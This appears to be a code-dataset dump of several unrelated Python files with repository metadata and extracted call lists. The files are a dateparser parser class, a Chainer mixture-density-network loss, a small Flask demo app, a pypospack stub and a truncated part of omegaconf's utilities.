class DateDataParser(object):
"""
Class which handles language detection, translation and subsequent generic parsing of
string representing date and/or time.
:param languages:
A list of two letters language codes, e.g. ['en', 'es'].
If languages are given, it will not attempt to detect the language.
:type languages: list
:param allow_redetect_language:
Enables/disables language re-detection.
:type allow_redetect_language: bool
:param settings:
Configure customized behavior using settings defined in :mod:`dateparser.conf.Settings`.
:type settings: dict
:return: A parser instance
:raises:
ValueError - Unknown Language, TypeError - Languages argument must be a list
"""
language_loader = None
@apply_settings
def __init__(self, languages=None, allow_redetect_language=False, settings=None):
self._settings = settings
available_language_map = self._get_language_loader().get_language_map()
if isinstance(languages, (list, tuple, collections.Set)):
if all([language in available_language_map for language in languages]):
languages = [available_language_map[language] for language in languages]
else:
unsupported_languages = set(languages) - set(available_language_map.keys())
raise ValueError(
"Unknown language(s): %s" % ', '.join(map(repr, unsupported_languages)))
elif languages is not None:
raise TypeError("languages argument must be a list (%r given)" % type(languages))
if allow_redetect_language:
self.language_detector = AutoDetectLanguage(
languages if languages else list(available_language_map.values()),
allow_redetection=True)
elif languages:
self.language_detector = ExactLanguages(languages=languages)
else:
self.language_detector = AutoDetectLanguage(
list(available_language_map.values()), allow_redetection=False)
def get_date_data(self, date_string, date_formats=None):
"""
Parse string representing date and/or time in recognizable localized formats.
Supports parsing multiple languages and timezones.
:param date_string:
A string representing date and/or time in a recognizably valid format.
:type date_string: str|unicode
:param date_formats:
A list of format strings using directives as given
`here <https://docs.python.org/2/library/datetime.html#strftime-and-strptime-behavior>`_.
The parser applies formats one by one, taking into account the detected languages.
:type date_formats: list
:return: a dict mapping keys to :mod:`datetime.datetime` object and *period*. For example:
{'date_obj': datetime.datetime(2015, 6, 1, 0, 0), 'period': u'day'}
:raises: ValueError - Unknown Language
.. note:: *Period* values can be a 'day' (default), 'week', 'month', 'year'.
*Period* represents the granularity of date parsed from the given string.
In the example below, since no day information is present, the day is assumed to be current
day ``16`` from *current date* (which is June 16, 2015, at the moment of writing this).
Hence, the level of precision is ``month``:
>>> DateDataParser().get_date_data(u'March 2015')
{'date_obj': datetime.datetime(2015, 3, 16, 0, 0), 'period': u'month'}
Similarly, for date strings with no day and month information present, level of precision
is ``year`` and day ``16`` and month ``6`` are from *current_date*.
>>> DateDataParser().get_date_data(u'2014')
{'date_obj': datetime.datetime(2014, 6, 16, 0, 0), 'period': u'year'}
Dates with time zone indications or UTC offsets are returned in UTC time unless
specified using `Settings`_.
>>> DateDataParser().get_date_data(u'23 March 2000, 1:21 PM CET')
{'date_obj': datetime.datetime(2000, 3, 23, 14, 21), 'period': 'day'}
"""
if not(isinstance(date_string, six.text_type) or isinstance(date_string, six.string_types)):
raise TypeError('Input type must be str or unicode')
res = parse_with_formats(date_string, date_formats or [], self._settings)
if res['date_obj']:
return res
if self._settings.NORMALIZE:
date_string = normalize_unicode(date_string)
date_string = sanitize_date(date_string)
for language in self.language_detector.iterate_applicable_languages(
date_string, modify=True, settings=self._settings):
parsed_date = _DateLanguageParser.parse(
language, date_string, date_formats, settings=self._settings)
if parsed_date:
parsed_date['language'] = language.shortname
return parsed_date
else:
return {'date_obj': None, 'period': 'day', 'language': None}
def get_date_tuple(self, *args, **kwargs):
date_tuple = collections.namedtuple('DateData', 'date_obj period language')
date_data = self.get_date_data(*args, **kwargs)
return date_tuple(**date_data)
@classmethod
def _get_language_loader(cls):
if not cls.language_loader:
cls.language_loader = LanguageDataLoader()
return cls.language_loader
| [((31, 10, 31, 47), 'regex.compile', 're.compile', (), '', True, 'import regex as re\n'), ((32, 12, 32, 30), 'regex.compile', 're.compile', ({(32, 23, 32, 29): '"""\\\\s+"""'}, {}), "('\\\\s+')", True, 'import regex as re\n'), ((33, 17, 33, 47), 'regex.compile', 're.compile', ({(33, 28, 33, 46): '"""^\\\\s+(\\\\S.*?)\\\\s+$"""'}, {}), "('^\\\\s+(\\\\S.*?)\\\\s+$')", True, 'import regex as re\n'), ((35, 19, 35, 104), 'regex.compile', 're.compile', (), '', True, 'import regex as re\n'), ((36, 22, 36, 72), 'regex.compile', 're.compile', (), '', True, 'import regex as re\n'), ((37, 19, 37, 79), 'regex.compile', 're.compile', (), '', True, 'import regex as re\n'), ((38, 17, 38, 46), 'regex.compile', 're.compile', ({(38, 28, 38, 45): '"""^.*?on:\\\\s+(.*)"""'}, {}), "('^.*?on:\\\\s+(.*)')", True, 'import regex as re\n'), ((41, 22, 41, 54), 'regex.compile', 're.compile', ({(41, 33, 41, 53): '"""^\\\\d{10}(?![^\\\\d.])"""'}, {}), "('^\\\\d{10}(?![^\\\\d.])')", True, 'import regex as re\n'), ((77, 11, 77, 45), 'dateutil.relativedelta.relativedelta', 'relativedelta', ({}, {}), "(**{(period + 's'): 1})", False, 'from dateutil.relativedelta import relativedelta\n'), ((58, 11, 58, 34), 'dateutil.relativedelta.relativedelta', 'relativedelta', ({}, {}), '(**kwargs)', False, 'from dateutil.relativedelta import relativedelta\n'), ((58, 50, 58, 71), 'dateutil.relativedelta.relativedelta', 'relativedelta', (), '', False, 'from dateutil.relativedelta import relativedelta\n'), ((117, 19, 117, 67), 'dateparser.utils.apply_timezone_from_settings', 'apply_timezone_from_settings', ({(117, 48, 117, 56): 'date_obj', (117, 58, 117, 66): 'settings'}, {}), '(date_obj, settings)', False, 'from dateparser.utils import normalize_unicode, apply_timezone_from_settings\n'), ((122, 11, 122, 43), 'calendar.monthrange', 'calendar.monthrange', ({(122, 31, 122, 35): 'year', (122, 37, 122, 42): 'month'}, {}), '(year, month)', False, 'import calendar\n'), ((387, 21, 387, 83), 'collections.namedtuple', 'collections.namedtuple', ({(387, 44, 387, 54): '"""DateData"""', (387, 56, 387, 82): '"""date_obj period language"""'}, {}), "('DateData', 'date_obj period language')", False, 'import collections\n'), ((134, 23, 134, 66), 'datetime.datetime.strptime', 'datetime.strptime', ({(134, 41, 134, 52): 'date_string', (134, 54, 134, 65): 'date_format'}, {}), '(date_string, date_format)', False, 'from datetime import datetime, timedelta\n'), ((149, 23, 149, 71), 'dateparser.utils.apply_timezone_from_settings', 'apply_timezone_from_settings', ({(149, 52, 149, 60): 'date_obj', (149, 62, 149, 70): 'settings'}, {}), '(date_obj, settings)', False, 'from dateparser.utils import normalize_unicode, apply_timezone_from_settings\n'), ((162, 12, 162, 64), 'warnings.warn', 'warn', ({(162, 17, 162, 48): 'self.DATE_FORMATS_ERROR_MESSAGE', (162, 50, 162, 63): 'FutureWarning'}, {}), '(self.DATE_FORMATS_ERROR_MESSAGE, FutureWarning)', False, 'from warnings import warn\n'), ((372, 26, 372, 56), 'dateparser.utils.normalize_unicode', 'normalize_unicode', ({(372, 44, 372, 55): 'date_string'}, {}), '(date_string)', False, 'from dateparser.utils import normalize_unicode, apply_timezone_from_settings\n'), ((394, 34, 394, 54), 'dateparser.languages.loader.LanguageDataLoader', 'LanguageDataLoader', ({}, {}), '()', False, 'from dateparser.languages.loader import LanguageDataLoader\n'), ((146, 24, 146, 40), 'datetime.datetime.today', 'datetime.today', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((316, 37, 316, 72), 'dateparser.languages.detection.ExactLanguages', 'ExactLanguages', (), '', False, 'from dateparser.languages.detection import AutoDetectLanguage, ExactLanguages\n')] |
kristofbc/handwriting-synthesis | src/models/functions/connection/mixture_density_network.py | 16505e89fd7275d4cd3ed9c4388c9f3c153a0397 | import chainer
import chainer.functions
from chainer.utils import type_check
from chainer import cuda
from chainer import function
import numpy as np
#from chainer import function_node
from utils import clip_grad
#class MixtureDensityNetworkFunction(function_node.FunctionNode):
class MixtureDensityNetworkFunction(function.Function):
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 8)
x_type, eos_input_type, pi_input_type, mu_x1_input_type, mu_x2_input_type, s_x1_input_type, s_x2_input_type, rho_input_type = in_types
type_check.expect(
x_type.dtype.kind == 'f',
eos_input_type.dtype.kind == 'f',
pi_input_type.dtype.kind == 'f',
mu_x1_input_type.dtype.kind == 'f',
mu_x2_input_type.dtype.kind == 'f',
s_x1_input_type.dtype.kind == 'f',
s_x2_input_type.dtype.kind == 'f',
rho_input_type.dtype.kind == 'f',
x_type.ndim >= 2,
eos_input_type.ndim >= 2,
x_type.shape[0] == eos_input_type.shape[0],
x_type.shape[0] == pi_input_type.shape[0],
x_type.shape[0] == mu_x1_input_type.shape[0],
x_type.shape[0] == mu_x2_input_type.shape[0],
x_type.shape[0] == s_x1_input_type.shape[0],
x_type.shape[0] == s_x2_input_type.shape[0],
x_type.shape[0] == rho_input_type.shape[0],
pi_input_type.shape[1] == mu_x1_input_type.shape[1],
mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1],
mu_x2_input_type.shape[1] == s_x1_input_type.shape[1],
s_x1_input_type.shape[1] == s_x2_input_type.shape[1],
s_x2_input_type.shape[1] == rho_input_type.shape[1]
)
pass
def forward(self, inputs):
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
#self.retain_inputs(range(len(inputs))) # Retain everything for backward
if not type_check.same_types(*inputs):
raise ValueError("numpy and cupy must not be used together\n"
"type(x): {0}, type(eos_input): {1}, type(pi_input): {2}"
"type(mu_x1_input): {3}, type(mu_x2_input): {4}, type(s_x1_input): {5}"
"type(s_x2_input): {6}, type(rho_input): {7}"
.format(type(x), type(eos_input), type(pi_input),
type(mu_x1_input), type(mu_x2_input), type(s_x1_input),
type(s_x2_input), type(rho_input)))
xp = cuda.get_array_module(*inputs)
def softmax(x):
shiftx = x - x.max()
exps = xp.exp(shiftx)
return exps / xp.sum(exps, 1, keepdims=True)
# Get MDN coeff. Eq #18 to #22
z_eos = 1. / (1. + xp.exp(eos_input)) # F.sigmoid. NOTE: usually sigmoid is 1/(1+e^-x). Here 'x' is >0!
z_s_x1 = xp.exp(s_x1_input) + 1e-10
z_s_x2 = xp.exp(s_x2_input) + 1e-10
z_rho = xp.tanh(rho_input)
z_pi = softmax(pi_input)
#z_pi = xp.exp(pi_input)
#z_pi = z_pi / xp.sum(z_pi, 1, keepdims=True)
z_mu_x1 = mu_x1_input
z_mu_x2 = mu_x2_input
# The MDN coeff are saved, because they're reused in the backward phase
self.z_eos = z_eos
self.z_s_x1 = z_s_x1
self.z_s_x2 = z_s_x2
self.z_rho = z_rho
self.z_pi = z_pi
self.z_mu_x1 = z_mu_x1
self.z_mu_x2 = z_mu_x2
# Compute the loss.
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
# Z variable. Eq. 25
norm_x1 = x1 - z_mu_x1
norm_x2 = x2 - z_mu_x2
z_left = (xp.square(norm_x1)/xp.square(z_s_x1)) + (xp.square(norm_x2)/xp.square(z_s_x2))
z_right = (2.*z_rho*norm_x1*norm_x2)/(z_s_x1*z_s_x2)
z = z_left - z_right
self.z = z
# Normal function. Eq. 24.
inv_ro = 1. - xp.square(z_rho) + 1e-10
n_left = 2. * np.pi * z_s_x1 * z_s_x2 * xp.sqrt(inv_ro) + 1e-10 # + 1e-10 for computational stability
n_right = xp.exp(-z / (2. * inv_ro))
n = n_right / n_left
# Gamma parameter (for the backward phase). Eq. 28-29
gamma = z_pi * n
gamma = gamma / (xp.sum(gamma, 1, keepdims=True) + 1e-10) # sum + 1e-10 for computational stability, != nan!
self.gamma = gamma
# Sequence loss. Eq. 26
loss_y = z_pi * n
loss_y = xp.sum(loss_y, 1, keepdims=True) + 1e-10 # + 1e-10 for computational stability, != nan
#epsilon = xp.full(loss_y.shape, 1e-10, dtype=xp.float32)
#loss_y = xp.maximum(loss_y, epsilon) # Because at the begining loss_y is exactly 0 sometime
loss_y = -xp.log(loss_y + 1e-10)
#loss_x = z_eos * x3 + (1. - z_eos) * (1. - x3)
#loss_x = -xp.log(loss_x)
loss_x = -x3 * xp.log(z_eos + 1e-10) - (1. - x3) * xp.log(1. - z_eos + 1e-10)
loss = loss_y + loss_x
# Mask guard to check if x3 == 2 (added padding)
idx_mask = xp.where(x3==2)[0]
mask = xp.ones_like(x3)
mask[idx_mask, 0] = 0.
self.mask = mask
loss *= mask
return loss, x, z_eos, z_pi, z_mu_x1, z_mu_x2, z_s_x1, z_s_x2, z_rho,
def backward(self, inputs, grad_outputs):
xp = cuda.get_array_module(*inputs)
#x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = self.get_retained_inputs()
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
# MDN coeff to differentiate
g_eos = xp.empty_like(eos_input)
g_s_x1 = xp.empty_like(s_x1_input)
g_s_x2 = xp.empty_like(s_x2_input)
g_rho = xp.empty_like(rho_input)
g_pi = xp.empty_like(pi_input)
g_mu_x1 = xp.empty_like(mu_x1_input)
g_mu_x2 = xp.empty_like(mu_x2_input)
# Compute the gradient
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
#if xp == np:
# From eq. 27 to 37
C = 1. / (1. - self.z_rho*self.z_rho + 1e-10)
d_norm_x1 = (x1 - self.z_mu_x1) / self.z_s_x1
d_norm_x2 = (x2 - self.z_mu_x2) / self.z_s_x2
d_rho_norm_x1 = self.z_rho * d_norm_x1
d_rho_norm_x2 = self.z_rho * d_norm_x2
g_eos = (x3 - self.z_eos) * self.mask
g_pi = (self.z_pi - self.gamma) * self.mask
g_mu_x1 = - self.gamma * ((C/self.z_s_x1) * (d_norm_x1 - d_rho_norm_x2)) * self.mask
g_mu_x2 = - self.gamma * ((C/self.z_s_x2) * (d_norm_x2 - d_rho_norm_x1)) * self.mask
g_s_x1 = - self.gamma * ((C*d_norm_x1) * (d_norm_x1 - d_rho_norm_x2) - 1.) * self.mask
g_s_x2 = - self.gamma * ((C*d_norm_x2) * (d_norm_x2 - d_rho_norm_x1) - 1.) * self.mask
g_rho = - self.gamma * (d_norm_x1*d_norm_x2 + self.z_rho*(1. - C * self.z)) * self.mask
#else:
# g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho = cuda.elementwise(
# 'T x1, T x2, T eos_input, T pi_input, T mu_x1_input, T mu_x2_input, T s_x1_input, T s_x2_input, T rho_input',
# 'T g_eos, T g_pi, T g_mu_x1, T g_mu_x2, T g_s_x1, T g_s_x2, T g_rho',
# )
# Add grad_clipping here if it explodes P.23
th_min = -100.0
th_max = 100.0
g_eos = clip_grad(g_eos, th_min, th_max, xp)
g_pi = clip_grad(g_pi, th_min, th_max, xp)
g_mu_x1 = clip_grad(g_mu_x1, th_min, th_max, xp)
g_mu_x2 = clip_grad(g_mu_x2, th_min, th_max, xp)
g_s_x1 = clip_grad(g_s_x1, th_min, th_max, xp)
g_s_x2 = clip_grad(g_s_x2, th_min, th_max, xp)
g_rho = clip_grad(g_rho, th_min, th_max, xp)
return None, g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho,
def mixture_density_network(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho):
""" Mixture Density Network
Output the coefficient params
Args:
x (Variable): Tensor containing the position [x1, x2, x3] to predict
eos (Variable): End-of-stroke prediction
pi (Variable): mixture components
mu_x1 (Variable): mean of x1
mu_x2 (Variable): mean of x2
s_x1 (Variable): variance of x1
s_x2 (Variable): variance of x2
rho (Variable): correlation parameter
Returns:
loss (Variable)
y (Variable)
eos (Variable)
pi (Variable)
mu_x1 (Variable)
mu_x2 (Variable)
s_x1 (Variable)
s_x2 (Variable)
rho (Variable)
"""
return MixtureDensityNetworkFunction()(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho)
| [((19, 8, 45, 9), 'chainer.utils.type_check.expect', 'type_check.expect', ({(20, 12, 20, 36): "(x_type.dtype.kind == 'f')", (21, 12, 21, 44): "(eos_input_type.dtype.kind == 'f')", (22, 12, 22, 43): "(pi_input_type.dtype.kind == 'f')", (23, 12, 23, 46): "(mu_x1_input_type.dtype.kind == 'f')", (24, 12, 24, 46): "(mu_x2_input_type.dtype.kind == 'f')", (25, 12, 25, 45): "(s_x1_input_type.dtype.kind == 'f')", (26, 12, 26, 45): "(s_x2_input_type.dtype.kind == 'f')", (27, 12, 27, 44): "(rho_input_type.dtype.kind == 'f')", (29, 12, 29, 28): '(x_type.ndim >= 2)', (30, 12, 30, 36): '(eos_input_type.ndim >= 2)', (32, 12, 32, 54): '(x_type.shape[0] == eos_input_type.shape[0])', (33, 12, 33, 53): '(x_type.shape[0] == pi_input_type.shape[0])', (34, 12, 34, 56): '(x_type.shape[0] == mu_x1_input_type.shape[0])', (35, 12, 35, 56): '(x_type.shape[0] == mu_x2_input_type.shape[0])', (36, 12, 36, 55): '(x_type.shape[0] == s_x1_input_type.shape[0])', (37, 12, 37, 55): '(x_type.shape[0] == s_x2_input_type.shape[0])', (38, 12, 38, 54): '(x_type.shape[0] == rho_input_type.shape[0])', (40, 12, 40, 63): '(pi_input_type.shape[1] == mu_x1_input_type.shape[1])', (41, 12, 41, 66): '(mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1])', (42, 12, 42, 65): '(mu_x2_input_type.shape[1] == s_x1_input_type.shape[1])', (43, 12, 43, 64): '(s_x1_input_type.shape[1] == s_x2_input_type.shape[1])', (44, 12, 44, 63): '(s_x2_input_type.shape[1] == rho_input_type.shape[1])'}, {}), "(x_type.dtype.kind == 'f', eos_input_type.dtype.kind ==\n 'f', pi_input_type.dtype.kind == 'f', mu_x1_input_type.dtype.kind ==\n 'f', mu_x2_input_type.dtype.kind == 'f', s_x1_input_type.dtype.kind ==\n 'f', s_x2_input_type.dtype.kind == 'f', rho_input_type.dtype.kind ==\n 'f', x_type.ndim >= 2, eos_input_type.ndim >= 2, x_type.shape[0] ==\n eos_input_type.shape[0], x_type.shape[0] == pi_input_type.shape[0], \n x_type.shape[0] == mu_x1_input_type.shape[0], x_type.shape[0] ==\n mu_x2_input_type.shape[0], x_type.shape[0] == s_x1_input_type.shape[0],\n x_type.shape[0] == s_x2_input_type.shape[0], x_type.shape[0] ==\n rho_input_type.shape[0], pi_input_type.shape[1] == mu_x1_input_type.\n shape[1], mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1], \n mu_x2_input_type.shape[1] == s_x1_input_type.shape[1], s_x1_input_type.\n shape[1] == s_x2_input_type.shape[1], s_x2_input_type.shape[1] ==\n rho_input_type.shape[1])", False, 'from chainer.utils import type_check\n'), ((62, 13, 62, 43), 'chainer.cuda.get_array_module', 'cuda.get_array_module', ({(62, 35, 62, 42): '*inputs'}, {}), '(*inputs)', False, 'from chainer import cuda\n'), ((136, 13, 136, 43), 'chainer.cuda.get_array_module', 'cuda.get_array_module', ({(136, 35, 136, 42): '*inputs'}, {}), '(*inputs)', False, 'from chainer import cuda\n'), ((181, 16, 181, 52), 'utils.clip_grad', 'clip_grad', ({(181, 26, 181, 31): 'g_eos', (181, 33, 181, 39): 'th_min', (181, 41, 181, 47): 'th_max', (181, 49, 181, 51): 'xp'}, {}), '(g_eos, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((182, 15, 182, 50), 'utils.clip_grad', 'clip_grad', ({(182, 25, 182, 29): 'g_pi', (182, 31, 182, 37): 'th_min', (182, 39, 182, 45): 'th_max', (182, 47, 182, 49): 'xp'}, {}), '(g_pi, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((183, 18, 183, 56), 'utils.clip_grad', 'clip_grad', ({(183, 28, 183, 35): 'g_mu_x1', (183, 37, 183, 43): 'th_min', (183, 45, 183, 51): 'th_max', (183, 53, 183, 55): 'xp'}, {}), '(g_mu_x1, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((184, 18, 184, 56), 'utils.clip_grad', 'clip_grad', ({(184, 28, 184, 35): 'g_mu_x2', (184, 37, 184, 43): 'th_min', (184, 45, 184, 51): 'th_max', (184, 53, 184, 55): 'xp'}, {}), '(g_mu_x2, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((185, 17, 185, 54), 'utils.clip_grad', 'clip_grad', ({(185, 27, 185, 33): 'g_s_x1', (185, 35, 185, 41): 'th_min', (185, 43, 185, 49): 'th_max', (185, 51, 185, 53): 'xp'}, {}), '(g_s_x1, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((186, 17, 186, 54), 'utils.clip_grad', 'clip_grad', ({(186, 27, 186, 33): 'g_s_x2', (186, 35, 186, 41): 'th_min', (186, 43, 186, 49): 'th_max', (186, 51, 186, 53): 'xp'}, {}), '(g_s_x2, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((187, 16, 187, 52), 'utils.clip_grad', 'clip_grad', ({(187, 26, 187, 31): 'g_rho', (187, 33, 187, 39): 'th_min', (187, 41, 187, 47): 'th_max', (187, 49, 187, 51): 'xp'}, {}), '(g_rho, th_min, th_max, xp)', False, 'from utils import clip_grad\n'), ((53, 15, 53, 45), 'chainer.utils.type_check.same_types', 'type_check.same_types', ({(53, 37, 53, 44): '*inputs'}, {}), '(*inputs)', False, 'from chainer.utils import type_check\n')] |
DazEB2/SimplePyScripts | flask__webservers/bootstrap_4__toggle_switch__examples/main.py | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# SOURCE: https://github.com/twbs/bootstrap
# SOURCE: https://github.com/gitbrent/bootstrap4-toggle
# SOURCE: https://gitbrent.github.io/bootstrap4-toggle/
from flask import Flask, render_template
app = Flask(__name__)
import logging
logging.basicConfig(level=logging.DEBUG)
@app.route("/")
def index():
return render_template('index.html')
if __name__ == '__main__':
app.debug = True
# Localhost
# port=0 -- random free port
# app.run(port=0)
app.run(
port=5000,
# :param threaded: should the process handle each request in a separate
# thread?
# :param processes: if greater than 1 then handle each request in a new process
# up to this maximum number of concurrent processes.
threaded=True,
)
# # Public IP
# app.run(host='0.0.0.0')
| [((13, 6, 13, 21), 'flask.Flask', 'Flask', ({(13, 12, 13, 20): '__name__'}, {}), '(__name__)', False, 'from flask import Flask, render_template\n'), ((16, 0, 16, 40), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((21, 11, 21, 40), 'flask.render_template', 'render_template', ({(21, 27, 21, 39): '"""index.html"""'}, {}), "('index.html')", False, 'from flask import Flask, render_template\n')] |
eragasa/pypospack | dev/phonts/visualization/phonts.py | 21cdecaf3b05c87acc532d992be2c04d85bfbc22 | import pypospack.io.phonts as phonts
# <---- additional classes and functions in which to add top
# <---- pypospack.io.phonts
if __name__ == "__main__":
| [] |
sugatoray/omegaconf | omegaconf/_utils.py | edf9e86493a14b0e909e956d9bae59b9861ef9c5 | import copy
import os
import re
import string
import sys
import warnings
from contextlib import contextmanager
from enum import Enum
from textwrap import dedent
from typing import (
Any,
Dict,
Iterator,
List,
Optional,
Tuple,
Type,
Union,
get_type_hints,
)
import yaml
from .errors import (
ConfigIndexError,
ConfigTypeError,
ConfigValueError,
GrammarParseError,
OmegaConfBaseException,
ValidationError,
)
from .grammar_parser import SIMPLE_INTERPOLATION_PATTERN, parse
try:
import dataclasses
except ImportError: # pragma: no cover
dataclasses = None # type: ignore # pragma: no cover
try:
import attr
except ImportError: # pragma: no cover
attr = None # type: ignore # pragma: no cover
# Regexprs to match key paths like: a.b, a[b], ..a[c].d, etc.
# We begin by matching the head (in these examples: a, a, ..a).
# This can be read as "dots followed by any character but `.` or `[`"
# Note that a key starting with brackets, like [a], is purposedly *not*
# matched here and will instead be handled in the next regex below (this
# is to keep this regex simple).
KEY_PATH_HEAD = re.compile(r"(\.)*[^.[]*")
# Then we match other keys. The following expression matches one key and can
# be read as a choice between two syntaxes:
# - `.` followed by anything except `.` or `[` (ex: .b, .d)
# - `[` followed by anything then `]` (ex: [b], [c])
KEY_PATH_OTHER = re.compile(r"\.([^.[]*)|\[(.*?)\]")
# source: https://yaml.org/type/bool.html
YAML_BOOL_TYPES = [
"y",
"Y",
"yes",
"Yes",
"YES",
"n",
"N",
"no",
"No",
"NO",
"true",
"True",
"TRUE",
"false",
"False",
"FALSE",
"on",
"On",
"ON",
"off",
"Off",
"OFF",
]
class Marker:
def __init__(self, desc: str):
self.desc = desc
def __repr__(self) -> str:
return self.desc
# To be used as default value when `None` is not an option.
_DEFAULT_MARKER_: Any = Marker("_DEFAULT_MARKER_")
class OmegaConfDumper(yaml.Dumper): # type: ignore
str_representer_added = False
@staticmethod
def str_representer(dumper: yaml.Dumper, data: str) -> yaml.ScalarNode:
with_quotes = yaml_is_bool(data) or is_int(data) or is_float(data)
return dumper.represent_scalar(
yaml.resolver.BaseResolver.DEFAULT_SCALAR_TAG,
data,
style=("'" if with_quotes else None),
)
def get_omega_conf_dumper() -> Type[OmegaConfDumper]:
if not OmegaConfDumper.str_representer_added:
OmegaConfDumper.add_representer(str, OmegaConfDumper.str_representer)
OmegaConfDumper.str_representer_added = True
return OmegaConfDumper
def yaml_is_bool(b: str) -> bool:
return b in YAML_BOOL_TYPES
def get_yaml_loader() -> Any:
class OmegaConfLoader(yaml.SafeLoader): # type: ignore
def construct_mapping(self, node: yaml.Node, deep: bool = False) -> Any:
keys = set()
for key_node, value_node in node.value:
if key_node.tag != yaml.resolver.BaseResolver.DEFAULT_SCALAR_TAG:
continue
if key_node.value in keys:
raise yaml.constructor.ConstructorError(
"while constructing a mapping",
node.start_mark,
f"found duplicate key {key_node.value}",
key_node.start_mark,
)
keys.add(key_node.value)
return super().construct_mapping(node, deep=deep)
loader = OmegaConfLoader
loader.add_implicit_resolver(
"tag:yaml.org,2002:float",
re.compile(
"""^(?:
[-+]?(?:[0-9][0-9_]*)\\.[0-9_]*(?:[eE][-+]?[0-9]+)?
|[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)
|\\.[0-9_]+(?:[eE][-+][0-9]+)?
|[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\.[0-9_]*
|[-+]?\\.(?:inf|Inf|INF)
|\\.(?:nan|NaN|NAN))$""",
re.X,
),
list("-+0123456789."),
)
loader.yaml_implicit_resolvers = {
key: [
(tag, regexp)
for tag, regexp in resolvers
if tag != "tag:yaml.org,2002:timestamp"
]
for key, resolvers in loader.yaml_implicit_resolvers.items()
}
return loader
def _get_class(path: str) -> type:
from importlib import import_module
module_path, _, class_name = path.rpartition(".")
mod = import_module(module_path)
try:
klass: type = getattr(mod, class_name)
except AttributeError:
raise ImportError(f"Class {class_name} is not in module {module_path}")
return klass
def _is_union(type_: Any) -> bool:
return getattr(type_, "__origin__", None) is Union
def _resolve_optional(type_: Any) -> Tuple[bool, Any]:
"""Check whether `type_` is equivalent to `typing.Optional[T]` for some T."""
if getattr(type_, "__origin__", None) is Union:
args = type_.__args__
if len(args) == 2 and args[1] == type(None): # noqa E721
return True, args[0]
if type_ is Any:
return True, Any
return False, type_
def _is_optional(obj: Any, key: Optional[Union[int, str]] = None) -> bool:
"""Check `obj` metadata to see if the given node is optional."""
from .base import Container, Node
if key is not None:
assert isinstance(obj, Container)
obj = obj._get_node(key)
if isinstance(obj, Node):
return obj._is_optional()
else:
# In case `obj` is not a Node, treat it as optional by default.
# This is used in `ListConfig.append` and `ListConfig.insert`
# where the appended/inserted value might or might not be a Node.
return True
def _resolve_forward(type_: Type[Any], module: str) -> Type[Any]:
import typing # lgtm [py/import-and-import-from]
forward = typing.ForwardRef if hasattr(typing, "ForwardRef") else typing._ForwardRef # type: ignore
if type(type_) is forward:
return _get_class(f"{module}.{type_.__forward_arg__}")
else:
if is_dict_annotation(type_):
kt, vt = get_dict_key_value_types(type_)
if kt is not None:
kt = _resolve_forward(kt, module=module)
if vt is not None:
vt = _resolve_forward(vt, module=module)
return Dict[kt, vt] # type: ignore
if is_list_annotation(type_):
et = get_list_element_type(type_)
if et is not None:
et = _resolve_forward(et, module=module)
return List[et] # type: ignore
return type_
def extract_dict_subclass_data(obj: Any, parent: Any) -> Optional[Dict[str, Any]]:
"""Check if obj is an instance of a subclass of Dict. If so, extract the Dict keys/values."""
from omegaconf.omegaconf import _maybe_wrap
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
subclasses_dict = is_dict_subclass(obj_type)
if subclasses_dict:
warnings.warn(
f"Class `{obj_type.__name__}` subclasses `Dict`."
+ " Subclassing `Dict` in Structured Config classes is deprecated,"
+ " see github.com/omry/omegaconf/issues/663",
UserWarning,
stacklevel=9,
)
if is_type:
return None
elif subclasses_dict:
dict_subclass_data = {}
key_type, element_type = get_dict_key_value_types(obj_type)
for name, value in obj.items():
is_optional, type_ = _resolve_optional(element_type)
type_ = _resolve_forward(type_, obj.__module__)
try:
dict_subclass_data[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=parent,
)
except ValidationError as ex:
format_and_raise(
node=None, key=name, value=value, cause=ex, msg=str(ex)
)
return dict_subclass_data
else:
return None
def get_attr_class_field_names(obj: Any) -> List[str]:
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
return list(attr.fields_dict(obj_type))
def get_attr_data(obj: Any, allow_objects: Optional[bool] = None) -> Dict[str, Any]:
from omegaconf.omegaconf import OmegaConf, _maybe_wrap
flags = {"allow_objects": allow_objects} if allow_objects is not None else {}
from omegaconf import MISSING
d = {}
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
dummy_parent = OmegaConf.create({}, flags=flags)
dummy_parent._metadata.object_type = obj_type
for name, attrib in attr.fields_dict(obj_type).items():
is_optional, type_ = _resolve_optional(attrib.type)
type_ = _resolve_forward(type_, obj.__module__)
if not is_type:
value = getattr(obj, name)
else:
value = attrib.default
if value == attr.NOTHING:
value = MISSING
if _is_union(type_):
e = ConfigValueError(
f"Union types are not supported:\n{name}: {type_str(type_)}"
)
format_and_raise(node=None, key=None, value=value, cause=e, msg=str(e))
try:
